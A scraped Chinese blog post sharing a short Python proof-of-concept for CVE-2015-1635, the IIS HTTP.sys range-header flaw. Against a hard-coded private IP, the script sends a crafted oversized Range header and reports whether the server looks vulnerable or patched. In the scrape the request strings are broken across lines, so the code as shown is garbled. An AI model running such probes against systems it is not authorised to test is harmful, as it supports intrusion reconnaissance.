zoukankan      html  css  js  c++  java
  • cve-2015-1635 poc

     1 import socket
     2 import random
     3 ipAddr = "10.1.89.20"
     4 hexAllFfff = "18446744073709551615"
     5 req1 = "GET / HTTP/1.0
    
    "
     6 req = "GET / HTTP/1.1
    Host: stuff
    Range: bytes=0-" + hexAllFfff + "
    
    "
     7 print("[*] Audit Started")
     8 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     9 client_socket.connect((ipAddr, 80))
    10 client_socket.send(req1.encode())
    11 boringResp = client_socket.recv(1024).decode()
    12 if "Microsoft" not in boringResp:
    13                 print("[*] Not IIS")
    14                 exit(0)
    15 client_socket.close()
    16 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    17 client_socket.connect((ipAddr, 80))
    18 client_socket.send(req.encode())
    19 goodResp = client_socket.recv(1024).decode()
    20 if "Requested Range Not Satisfiable" in goodResp:
    21                 print("[!!] Looks VULN")
    22 elif " The request has an invalid header name" in goodResp:
    23                 print("[*] Looks Patched")
    24 else:
    25                 print("[*] Unexpected response, cannot discern patch status")
    View Code

    这个漏洞则这几天也火了一把,poc附上。

  • 相关阅读:
    Web学习之css
    Spring学习之第一个hello world程序
    MySQL基础学习总结
    Jmeter参数化
    mysql慢查询解析-linux命令
    mysql慢查询
    mysql_存储引擎层-innodb buffer pool
    mysql_Qcahce
    memocached基础操作
    Memcached安装配置
  • 原文地址:https://www.cnblogs.com/cncyber/p/4434180.html
Copyright © 2011-2022 走看看